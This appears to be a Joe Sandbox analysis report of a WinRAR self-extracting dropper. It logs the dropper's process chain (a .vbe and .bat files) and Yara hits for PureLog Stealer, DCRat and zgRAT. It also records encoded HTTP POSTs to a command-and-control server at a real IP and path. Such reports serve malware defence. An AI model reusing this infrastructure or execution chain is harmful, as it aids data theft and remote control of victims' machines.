Dec 21, 2024 10:04:08.216196060 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 11 21 2b 36 0c 28 29 2f 10 2a 01 36 51 2a 10 0b 01 3b 0c 33 15 21 3c 3e 5f 29 13 3f 59 24 2e 05 1e 22 14 2d 5c 21 01 33 1d 3e 1b 2e 58 01 1e 22 1a 21 20 2e 0f 24 06 33 1c 3d 37 32 5c 3c 3d 32 58 27 11 30 0f 24 2a 23 06 3f 39 2f 0f 25 3d 00 12 3b 01 28 03 2b 3d 23 0c 30 0c 2b 51 03 1e 26 5d 31 2c 37 11 25 1d 1c 07 24 3d 22 04 37 3e 0e 0c 3e 01 2c 0e 37 02 36 5c 3b 00 3f 05 3f 3d 22 5d 3d 5e 25 06 27 5a 23 53 26 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989!+6()/6Q;3!<>_)?Y$."-\!3>.X"! .$3=72\<=2X'0$*#?9/%=;(+=#0+Q&]1,7%$="7>>,76\;??="]=^%'Z#S&>#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50025	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:04:06.726089001 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:04:07.078032970 CET	2536	OUT	Data Raw: 5d 53 46 50 58 5b 57 50 55 5e 55 5a 54 5d 50 56 57 5c 5c 5a 52 51 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]SFPX[WPU^UZT]PVW\\ZRQQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#9" V16=).0X0<$W:-V /9[12*P($ ?.$[)!_.#Q,>
Dec 21, 2024 10:04:08.103303909 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:04:08.340126991 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	50031	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:04:08.586894035 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:04:08.937341928 CET	2536	OUT	Data Raw: 58 50 43 57 5d 5d 57 57 55 5e 55 5a 54 58 50 55 57 53 5c 5c 52 56 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XPCW]]WWU^UZTXPUWS\\RVQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ D,1T1>1%.?'0,8U:"7?:&22?'+<= !_.#Q,*
Dec 21, 2024 10:04:09.964426041 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:04:10.200381994 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Target ID:	0
Start time:	04:02:04
Start date:	21/12/2024
Path:	C:\Users\user\Desktop\9FwQYJSj4N.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9FwQYJSj4N.exe"
Imagebase:	0x1000000
File size:	10'714'393 bytes
MD5 hash:	9342BE038F6FF329AAFFDC2626F8D145
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2080050228.00000000048E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2080638886.00000000048E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:02:05
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe"
Imagebase:	0x700000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:02:09
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:02:09
Start date:	21/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:02:09
Start date:	21/12/2024
Path:	C:\providerBrowserruntimeCrt\Providerbroker.exe
Wow64 process (32bit):	false
Commandline:	"C:\providerBrowserruntimeCrt/Providerbroker.exe"
Imagebase:	0x450000
File size:	10'393'088 bytes
MD5 hash:	ADAE028E0A5A72D219A02BB06D92241A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2131916065.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\providerBrowserruntimeCrt\Providerbroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\providerBrowserruntimeCrt\Providerbroker.exe, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:02:16
Start date:	21/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat"
Imagebase:	0x7ff6a7180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:02:16
Start date:	21/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:02:16
Start date:	21/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff602970000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:02:16
Start date:	21/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6ed4e0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:02:25
Start date:	21/12/2024
Path:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
Wow64 process (32bit):	false
Commandline:	"C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe"
Imagebase:	0xb10000
File size:	10'393'088 bytes
MD5 hash:	ADAE028E0A5A72D219A02BB06D92241A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3319845623.0000000003810000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3319845623.00000000039E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1492
Total number of Limit Nodes:	45

Executed Functions

Function 0101DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01010863: GetModuleHandleW.KERNEL32(kernel32), ref: 0101087C
Part of subcall function 01010863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0101088E
Part of subcall function 01010863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 010108BF

Part of subcall function 0101A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0101A655

Part of subcall function 0101AC16: OleInitialize.OLE32(00000000), ref: 0101AC2F
Part of subcall function 0101AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101AC66
Part of subcall function 0101AC16: SHGetMalloc.SHELL32(01048438), ref: 0101AC70

GetCommandLineW.KERNEL32 ref: 0101DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0101DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0101DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 0101DFCE

Part of subcall function 0101DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0101DBF4
Part of subcall function 0101DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101DC30

CloseHandle.KERNEL32(00000000), ref: 0101DFD7
GetModuleFileNameW.KERNEL32(00000000,0105EC90,00000800), ref: 0101DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0105EC90), ref: 0101DFFE
GetLocalTime.KERNEL32(?), ref: 0101E009
_swprintf.LIBCMT ref: 0101E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0101E05A
GetModuleHandleW.KERNEL32(00000000), ref: 0101E061
LoadIconW.USER32(00000000,00000064), ref: 0101E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0101E0C9
Sleep.KERNEL32(?), ref: 0101E0F7
DeleteObject.GDI32 ref: 0101E130
DeleteObject.GDI32(?), ref: 0101E140
CloseHandle.KERNEL32 ref: 0101E183

Strings

STARTDLG, xrefs: 0101E0BE
winrarsfxmappingfile.tmp, xrefs: 0101DF77
sfxname, xrefs: 0101DFF9
sfxstime, xrefs: 0101E055
C:\Users\user\Desktop, xrefs: 0101DF33
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0101E039

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-2656992072
Opcode ID: 98571407ce26698e408db54a3c591e95b01a4d7f3a819676e33d0d0f1718ea66
Instruction ID: 169e5dbff5c2af2d6a366f8b436719e9cd35bf404b3d500c8d1c4dd929759af2
Opcode Fuzzy Hash: 98571407ce26698e408db54a3c591e95b01a4d7f3a819676e33d0d0f1718ea66
Instruction Fuzzy Hash: F761E4B1904345AFE331ABA5DD88FAB7BECBB94704F00042DFAC596188DB7E9944C761

Function 0101A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0101B73D,00000066), ref: 0101A6D5
SizeofResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A6EC
LoadResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A703
LockResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A712
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A72D
GlobalLock.KERNEL32(00000000), ref: 0101A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0101A762
GlobalUnlock.KERNEL32(00000000), ref: 0101A7C6

Part of subcall function 0101A626: GdipAlloc.GDIPLUS(00000010), ref: 0101A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0101A7A7
GlobalFree.KERNEL32(00000000), ref: 0101A7CD

Strings

PNG, xrefs: 0101A6C6

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 03066ddc74fc67631f2715b65c1019b2ae00592fe11e1429bc582744f819ae31
Instruction ID: e05d5d054f1fd598029e52923233c4dccdc7b72c1e9bcef851d0c4173ac94a04
Opcode Fuzzy Hash: 03066ddc74fc67631f2715b65c1019b2ae00592fe11e1429bc582744f819ae31
Instruction Fuzzy Hash: 4F318F75601342AFD7219F65DC88D2B7FBCFF84661B000959F986C7218EB3AD8448BA0

Function 0100A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6C4

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A728
GetLastError.KERNEL32(?,?,?,?,0100A592,000000FF,?,?), ref: 0100A734

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: b836a4f60e53b1d4c5fde3395dd085f2cc390187ab7799c6322274763df0cbb3
Instruction ID: 82c9a94e331b1a8179dbaa81df9ac3a2e6ae24bb7387d15eb40314522a7b4148
Opcode Fuzzy Hash: b836a4f60e53b1d4c5fde3395dd085f2cc390187ab7799c6322274763df0cbb3
Instruction Fuzzy Hash: 56412F76600615EBDB26DF68CC84AE9B7B8FB48350F144196E59ED3240D7346E94CF90

Function 01027DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002,00000000), ref: 01027E0F
TerminateProcess.KERNEL32(00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002,00000000), ref: 01027E16
ExitProcess.KERNEL32 ref: 01027E28

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: a410e23ef94be68e1cac884ec0301330f63077dd553ce9f0ac4f4a74ece202a6
Instruction ID: ae39228f06da8265e714d8c693e5ad332db803b3f5f0ebbb7755172de69e6e96
Opcode Fuzzy Hash: a410e23ef94be68e1cac884ec0301330f63077dd553ce9f0ac4f4a74ece202a6
Instruction Fuzzy Hash: 2FE04F31000154ABCF126F54C988A89BF69FB24341B004454F8898A136CB3ADD51DB90

Function 0100848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01008493

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e5dd4ff5a692169f0eb4c41e4a25fcc54990332e17e4080a8518e74c8a47b804
Instruction ID: 1d3ccae0047f45bdf272886294366b4efea02d71dc036bfcf140d33b340f05a1
Opcode Fuzzy Hash: e5dd4ff5a692169f0eb4c41e4a25fcc54990332e17e4080a8518e74c8a47b804
Instruction Fuzzy Hash: D082C870D04246AEFF57DB68C894BFABBA9BF15200F0881FAD9C95B1C2D7715684CB60

Function 0101B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0101B7E5

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B8EF
IsDialogMessageW.USER32(?,?), ref: 0101B902
TranslateMessage.USER32(?), ref: 0101B910
DispatchMessageW.USER32(?), ref: 0101B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0101B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0101B960
GetDlgItem.USER32(?,00000068), ref: 0101B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101B99E
SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101B9B1

Part of subcall function 0101D453: _wcslen.LIBCMT ref: 0101D47D

SetFocus.USER32(00000000), ref: 0101B9B8
_swprintf.LIBCMT ref: 0101BA24

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Part of subcall function 0101D4D4: GetDlgItem.USER32(00000068,0105FCB8), ref: 0101D4E8
Part of subcall function 0101D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0101AF07,00000001,?,?,0101B7B9,0103506C,0105FCB8,0105FCB8,00001000,00000000,00000000), ref: 0101D510
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101D51B
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101D529
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D53F
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101D559
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D59D
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101D5AB
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D5BA
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D5E1
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,010343F4), ref: 0101D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0101BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0101BA90
GetTickCount.KERNEL32 ref: 0101BAAE
_swprintf.LIBCMT ref: 0101BAC2
GetLastError.KERNEL32(?,00000011), ref: 0101BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0101BB43
_swprintf.LIBCMT ref: 0101BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0101BBD0
GetCommandLineW.KERNEL32 ref: 0101BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0101BC47
ShellExecuteExW.SHELL32(0000003C), ref: 0101BC6F
Sleep.KERNEL32(00000064), ref: 0101BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0101BCE2
CloseHandle.KERNEL32(00000000), ref: 0101BCEB
_swprintf.LIBCMT ref: 0101BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101BD7D
SetDlgItemTextW.USER32(?,00000065,010335F4), ref: 0101BD94
GetDlgItem.USER32(?,00000065), ref: 0101BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0101BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0101BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101BE68
_wcslen.LIBCMT ref: 0101BEBE
_swprintf.LIBCMT ref: 0101BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 0101BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0101BF4C
GetDlgItem.USER32(?,00000068), ref: 0101BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0101BF6B
GetDlgItem.USER32(?,00000066), ref: 0101BF85
SetWindowTextW.USER32(00000000,0104A472), ref: 0101BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0101C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0101C0BD
EnableWindow.USER32(00000000,00000000), ref: 0101C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0101C1D9

Part of subcall function 0101C73F: __EH_prolog.LIBCMT ref: 0101C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101C1FD

Strings

STARTDLG, xrefs: 0101B801
<, xrefs: 0101BB84
__tmp_rar_sfx_access_check_%u, xrefs: 0101BAB5
winrarsfxmappingfile.tmp, xrefs: 0101BBA6
"%s"%s, xrefs: 0101BD0D
-el -s2 "-d%s" "-sp%s", xrefs: 0101BB6B
%s, xrefs: 0101BED8
@, xrefs: 0101BB91
LICENSEDLG, xrefs: 0101C0B2
